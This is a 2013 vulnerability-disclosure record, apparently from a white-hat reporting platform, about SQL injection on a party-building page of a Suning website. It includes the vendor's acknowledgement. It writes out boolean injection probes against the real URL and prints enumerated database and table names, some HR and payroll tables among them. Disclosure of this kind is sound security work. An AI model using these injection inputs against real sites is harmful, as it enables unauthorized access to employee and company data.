漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:苏宁官网建党工作SQL注入漏洞
提交时间:2013-10-17 19:07
修复时间:2013-12-01 19:08
公开时间:2013-12-01 19:08
漏洞类型:SQL注射漏洞
危害等级:低
自评Rank:5
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情 披露状态:
2013-10-17: 细节已通知厂商并且等待厂商处理中 2013-10-18: 厂商已经确认,细节仅向厂商公开 2013-10-28: 细节向核心白帽子及相关领域专家公开 2013-11-07: 细节向普通白帽子公开 2013-11-17: 细节向实习白帽子公开 2013-12-01: 细节向公众公开
简要描述: 苏宁官网建党工作SQL注入漏洞
详细说明: http://www.suning.com.cn/djgz/article.asp?id=14' 返回错误 http://www.suning.com.cn/djgz/article.asp?id=14 and 1=1 返回正常 http://www.suning.com.cn/djgz/article.asp?id=14 and 1=2 返回错误
漏洞证明:
available databases [29]: [*] BESMgmt [*] BMSStore [*] DB_ShuNin [*] Dell_CMDB [*] DeviceInfo [*] distribution [*] Ecardtong [*] FEPDW_S01 [*] HWATT [*] kaoqing [*] localGPSDB [*] MangageLeader3.0gr [*] master [*] Meet_DB [*] model [*] msdb [*] OATOAMS [*] PCMDB [*] PLDM [*] ReportServer [*] ReportServerTempDB [*] snuniversal [*] suning [*] suninghuanqiu [*] tempdb [*] VAMT [*] VirtualManagerDB [*] VMMDB [*] ZK
Database: kaoqing [67 tables] +--------------------------------------------+ | dbo.ACGroup | | dbo.ACTimeZones | | dbo.ACUnlockComb | | dbo.APEXSQL_LOG_CONNECTION_MONITOR_SESSION | | dbo.APEXSQL_LOG_LOGIN | | dbo.APEXSQL_LOG_STRINGS | | dbo.AlarmLog | | dbo.AttParam | | dbo.AuditedExc | | dbo.CGSL | | dbo.CHECKEXACT | | dbo.CHECKINOUT | | dbo.D99_CMD | | dbo.D99_REG | | dbo.DEFINE_1615851640395400 | | dbo.DEPARTMENTS | | dbo.DeptUsedSchs | | dbo.EXCNOTES | | dbo.EmOpLog | | dbo.FaceTemp | | dbo.GDXX | | dbo.HOLIDAYS | | dbo.LeaveClass | | dbo.LeaveClass1 | | dbo.Machines | | dbo.NBC_Tmp | | dbo.NUM_RUN | | dbo.NUM_RUN_DEIL | | dbo.ReportItem | | dbo.SECURITYDETAILS | | dbo.SHIFT | | dbo.SchClass | | dbo.ServerLog | | dbo.SystemLog | | dbo.TBKEY | | dbo.TBSMSALLOT | | dbo.TBSMSINFO | | dbo.TEMPLATE | | dbo.USERINFO | | dbo.USER_OF_RUN | | dbo.USER_SPEDAY | | dbo.USER_TEMP_SCH | | dbo.UserACMachines | | dbo.UserACPrivilege | | dbo.UserUpdates | | dbo.UserUsedSClasses | | dbo.UsersMachines | | dbo.acholiday | | dbo.djgz | | dbo.djgz_users | | dbo.grxx | | dbo.hr_pf | | dbo.hrtest | | dbo.kaoshi | | dbo.lynctest | | dbo.msmm_Pig_Tmp | | dbo.openwindow | | dbo.peixun | | dbo.pxfk | | dbo.pxmyd | | dbo.sysdiagrams | | dbo.test_user | | dbo.tree | | dbo.wa_payslip | | dbo.ygmyd | | dbo.zhidu | | dbo.zyzy_name | +--------------------------------------------+
修复方案: 漏洞回应 厂商回应: 危害等级:中
漏洞Rank:5
确认时间:2013-10-18 09:43
厂商回复: 先确认,感谢您对苏宁易购安全的关注。此站为苏宁环球集团所有,已通知相关人员进行处理。
最新状态: 暂无
漏洞评价:
评论